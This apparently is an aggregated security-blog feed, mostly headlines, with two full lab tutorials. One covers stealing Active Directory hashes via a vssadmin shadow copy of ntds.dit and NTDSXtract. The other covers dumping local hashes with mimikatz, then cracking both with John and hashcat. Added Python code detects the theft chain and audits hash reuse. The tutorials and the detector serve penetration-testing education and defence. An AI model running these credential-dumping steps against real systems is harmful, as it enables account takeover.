Phishing: The Secret of Its Success and What You Can Do to Stop It
7 years 3 months ago
Learn about the tricks attackers use to dupe unsuspecting users and how you can help protect them—and your organization.
A CISO Landmine: No Security Awareness Training
7 years 3 months ago
CISOs who fail to prioritize security awareness training are putting their business and assets at serious risk.
November 2017 security update release
7 years 3 months ago
Today, we released security updates to provide additional protections against malicious attackers. By default, Windows 10 receives these updates automatically, and for customers running previous versions, we recommend they turn on automatic updates as a best practice.
More information about this month’s security updates can be found in the Security Update Guide.
Is a Good Offense the Best Defense Against Hackers?
7 years 4 months ago
Proposed legislation could change existing laws that bar victims of hacking attacks from striking back.
Cracking AD Passwords with NTDSXtract, and John the Ripper
7 years 4 months ago
Recently Thycotic sponsored a webinar titled "Kali Linux: Using John the Ripper, Hashcat and Other Tools to Steal Privileged Accounts". During the webinar Randy spoke about the tools and steps to crack Active Directory domain accounts. Here are the steps we used to do so.
Creating a shadow copy of ntds.dit and the SYSTEM file
On our domain controller we will steal the Ntds.dit file using VSSAdmin. First we need to open an elevated command prompt. Then we will create a copy using VSS. Run “vssadmin create shadow /for=C:”
Using the “Shadow Copy Volume Name:” we need to extract ntds.dit using “copy ShadowCopyVolumeNameHere\windows\ntds\ntds.dit c:\files”. Note that you must use a valid target location for the copy. In the screenshot I used c:\Files and received an error because it does not exist. Using C:\junk, an existing directory, it worked.
We also need a copy of the SYSTEM file. You can easily retrieve this running “reg save hklm\system c:\junk”.
You should delete the shadow copy if you are done with it.
Copy your system file and ntds.dit from Windows to your Kali Linux box. Ignore pwd.txt since that is from other testing.
Extracting the data tables from ntds.dit using libesedb and esedbexport
Now we need libesedb to extract the tables from the ntds.dit file. If you don’t already have this installed you can get it with the following commands: “git clone”
Now navigate to that directory using “cd libesedb/”
We must first install the other prerequisites using “apt-get install git autoconf automake autopoint libtool pkg-config build-essential”
Run ./
Run ./
Run chmod +x configure
Run ./configure
Run make
Run sudo make install
Run ldconfig
Navigate to /usr/local/bin/ using “cd /usr/local/bin/”
Export the tables from ntds.dit by running “esedbexport -m tables /root/ntds.dit”
Copy the /usr/local/bin/ntds.dit.export folder to /root/.
Extracting the AD user account hashes using NTDSXtract
Next we have to download NTDSXtract by running this command: wget
Unzip the file by running “unzip”.
Then navigate to the directory you’ve extracted it to and “cd”.
Now you must run the python script in that folder using the files you have created. The command is “python /root/ntds.dit.export/datatable.4 /root/ntds.dit.export/link_table.7 /root/hashdumpwork --syshive /root/system --passwordhashes --lmoutfile /root/lm-out.txt --ntoutfile /root/nt-out.txt --pwdformat ophc”
You may have to substitute file paths if you have exported or moved the datatable files. The paths after --lmoutfile and --ntoutfile are output locations.
You will now have lm-out.txt and nt-out.txt files in your home directory.
Cracking the Hashes - Using Johnny
In Kali under Password Attacks open Johnny.
Click Open password file and select the (PASSWD format) option.
Select the nt-out.txt from the earlier steps and click Open.
You should now see a list of user accounts and hashes displayed.
Click on the Start new attack button and you should get passwords returned in the Password column.
Note: There are various types of attack methods under Options and a vast amount of wordlists available online. Since this is our production environment and we use very complex passwords, we entered a few known passwords into a custom wordlist dictionary file to expedite the cracking process.
Cracking the Hashes Using John
In Kali under Password Attacks open John.
Run the following command: john --rules=all --format=nt.old --fork=2 nt-out.txt
As you can see in the screenshot below, John will start to crack user passwords. You can see that someone in our domain has been creating test accounts using the same password of abc123$$.
Cracking the Hashes Using Hashcat
In Kali under Password Attacks open hashcat.
Run the following command: hashcat -m 1000 -a 0 nt-out.txt -o pwdhashcat.txt rockyou.txt --force --attack-mode 3
-m is our hash type
-a 0 is our attack mode, set to straight
--attack-mode 3 was also used, which is a brute-force attack
nt-out.txt is our file from the earlier steps that contains the user IDs and hashes
-o is our output file, which will be named pwdhashcat.txt
rockyou.txt is our dictionary file. This was downloaded off the web for this step.
Hashcat then began a brute force and dictionary attack. You will be able to see it attempting to crack password after password after password in the terminal window.
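The procedure above leaves a recognisable trail on the domain controller: a shadow copy is created, ntds.dit is copied out of the shadow volume, and the SYSTEM hive is exported with reg save. As an added example (not part of the original article), this Python snippet runs that detection over a handful of constructed process-creation events; the event layout, host names and the ten-minute window are assumptions for the example.

```python
import re
from datetime import datetime, timedelta

# Constructed process-creation events (Sysmon Event ID 1 style); not real logs.
# Each tuple: (timestamp, host, user, command line)
EVENTS = [
    ("2017-11-14 09:00:02", "DC01", r"CORP\admin", r"vssadmin create shadow /for=C:"),
    ("2017-11-14 09:00:40", "DC01", r"CORP\admin",
     r"copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\ntds\ntds.dit c:\junk"),
    ("2017-11-14 09:01:05", "DC01", r"CORP\admin", r"reg save hklm\system c:\junk\system"),
    ("2017-11-14 09:01:30", "DC01", r"CORP\admin", r"vssadmin delete shadows /shadow={shadow-id}"),
    # A lone shadow copy on a workstation (routine backup) must not trigger.
    ("2017-11-14 11:00:00", "WS07", r"CORP\backup", r"vssadmin create shadow /for=C:"),
]

# One pattern per stage of the technique walked through in the article.
STAGES = {
    "shadow_create": re.compile(r"vssadmin(\.exe)?\s+create\s+shadow", re.I),
    "ntds_copy":     re.compile(r"HarddiskVolumeShadowCopy\d+\\.*\\ntds\.dit", re.I),
    "system_hive":   re.compile(r"reg(\.exe)?\s+save\s+hklm\\system", re.I),
}

def classify(cmdline):
    """Return the stage names a single command line matches (usually 0 or 1)."""
    return [name for name, rx in STAGES.items() if rx.search(cmdline)]

def detect_ntds_theft(events, window=timedelta(minutes=10)):
    """Map host -> finding. A full three-stage chain inside `window` is critical;
    an ntds.dit copy out of a shadow volume is high on its own; a shadow copy
    alone is not reported, because backup software creates them legitimately."""
    per_host = {}
    for ts, host, user, cmd in events:
        t = datetime.strptime(ts, "%Y-%m-%d %H:%M:%S")
        for stage in classify(cmd):
            per_host.setdefault(host, []).append((t, stage, user))
    findings = {}
    for host, hits in per_host.items():
        stages = {s for _, s, _ in hits}
        times = [t for t, _, _ in hits]
        span = max(times) - min(times)
        if stages == set(STAGES) and span <= window:
            findings[host] = "critical: shadow copy, ntds.dit copy and SYSTEM hive export within window"
        elif "ntds_copy" in stages:
            findings[host] = "high: ntds.dit copied out of a shadow volume"
    return findings

if __name__ == "__main__":
    for host, why in detect_ntds_theft(EVENTS).items():
        print(host, "->", why)
```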
This article was contributed by Barry Vista.
Cracking local windows passwords with Mimikatz, LSA dump and Hashcat
7 years 4 months ago
Recently Thycotic sponsored a webinar titled "Kali Linux: Using John the Ripper, Hashcat and Other Tools to Steal Privileged Accounts". During the webinar Randy spoke about the tools and steps to crack local windows passwords. Here are the steps we used to do so.
Extracting a copy of the SYSTEM and SAM registry hives
We need to extract and copy the SYSTEM and SAM registry hives for the local machine. We do this by running “reg save hklm\sam” and “reg save hklm\security”.
Dumping the hashes with Mimikatz and LSAdump
Now we must use mimikatz to dump the hashes.
We need to run “lsadump::sam” from step 1 above. But as you can see in the screenshot below we get an error. This is because we do not have the proper access.
We must run at elevated privileges for the command to run successfully. We do this by running “privilege::debug” and then “token::elevate”.
Now run “log hash.txt” so that your next command will output to a txt file.
Now we can run the “lsadump::sam” from step 1 above successfully. It will display the username and hashes for all local users.
Navigate to the directory where mimikatz is located on your machine. In my instance it’s located in C:\Users\BarryVista\Downloads\mimikatz\x64. Here you will find the output in the hash.txt file.
We need to edit the contents of this file to display only the username and hash in this format – username:hash
Copy this file to your Kali Linux box home folder.
Cracking the hashes using Hashcat
Run hashcat with this command: hashcat -m 1000 -a 0 --force --show --username hash.txt wordlist1.lst
-m 1000 = hash type, in this case 1000 specifies a NTLM hash type
-a 0 = Straight attack mode
--force = ignore warnings
--show = compares hashlist with potfile; show cracked hashes
--username = enables ignoring of usernames in hashfile
hash.txt = our file with the username:hash information
wordlist1.lst = our word list with the passwords.
As you can see in the screenshot below we end up with the username, hash and password.
In this lab demo, we created a custom wordlist that contained our passwords with the exception of our real administrator password which is why it isn’t displayed. There are multiple sources on the web to download dictionary lists used for password cracking.
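Because NT hashes are unsalted, a username:hash file of the kind prepared above already reveals password reuse and empty passwords without cracking anything, which is how the earlier article could spot test accounts sharing one password. As an added example (not part of the original article), this Python snippet parses that format and reports both conditions; the sample dump and its hash values are constructed for the example, and the empty-password NT hash is the well-known constant.

```python
import re
from collections import defaultdict

# NT hash of the empty password (MD4 over the empty UTF-16LE string); well-known constant.
EMPTY_NT_HASH = "31d6cfe0d16ae931b73c59d7e0c089c0"
# username:hash layout, the same one hashcat's --username option expects.
LINE_RX = re.compile(r"^([^:\s]+):([0-9a-fA-F]{32})$")

# Constructed sample dump; the hash values are made up and belong to no real account.
SAMPLE_DUMP = """\
Administrator:a1b2c3d4e5f60718293a4b5c6d7e8f90
svc_backup:a1b2c3d4e5f60718293a4b5c6d7e8f90
Guest:31d6cfe0d16ae931b73c59d7e0c089c0
test01:0f1e2d3c4b5a69788796a5b4c3d2e1f0
test02:0f1e2d3c4b5a69788796a5b4c3d2e1f0
test03:0f1e2d3c4b5a69788796a5b4c3d2e1f0
this line has no colon
jdoe:NOTAHASH
"""

def parse_dump(text):
    """Return ({user: nthash}, [rejected lines]); hashes are lower-cased."""
    accounts, rejected = {}, []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = LINE_RX.match(line)
        if m:
            accounts[m.group(1)] = m.group(2).lower()
        else:
            rejected.append(line)  # keep for the analyst; hashcat would also skip these
    return accounts, rejected

def audit(accounts):
    """Flag empty passwords and password reuse by comparing hashes only.
    Identical NT hashes mean identical passwords, since no salt is involved."""
    by_hash = defaultdict(list)
    for user, h in accounts.items():
        by_hash[h].append(user)
    return {
        "empty_password": sorted(by_hash.get(EMPTY_NT_HASH, [])),
        "reused": {h: sorted(users) for h, users in by_hash.items()
                   if len(users) > 1 and h != EMPTY_NT_HASH},
    }

if __name__ == "__main__":
    accts, bad = parse_dump(SAMPLE_DUMP)
    report = audit(accts)
    print("rejected lines:", bad)
    print("empty password:", report["empty_password"])
    for h, users in report["reused"].items():
        print(f"same password on {len(users)} accounts: {', '.join(users)}")
```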
This article was contributed by Barry Vista.
What Happens to Encryption in a Post-Quantum Computing World?
7 years 4 months ago
As the possibility of quantum computing draws nearer, changes to today’s TLS key exchange algorithms will be required.
Assassin's Creed: Revelations on Xbox One -- Use Romanies/Mercenaries/Thieves on guard tips
7 years 4 months ago
Mike Zhang
CrashMe analysis tutorial 8 - Nested Exceptions
7 years 4 months ago
Mike Zhang
CrashMe analysis tutorial 9 - Access Test Variable
7 years 4 months ago
Mike Zhang
CrashMe analysis tutorial 10 – CheckForDebugger
7 years 4 months ago
Mike Zhang
CrashMe analysis tutorial 11 - Enter Critical Section
7 years 4 months ago
Mike Zhang
Dotfuscator & ClickOnce
7 years 4 months ago
Mike Zhang
CrashMe analysis tutorial 12 - Test Calling Conventions
7 years 4 months ago
Mike Zhang
CrashMe analysis tutorial 13 - Invalid Handles
7 years 4 months ago
Mike Zhang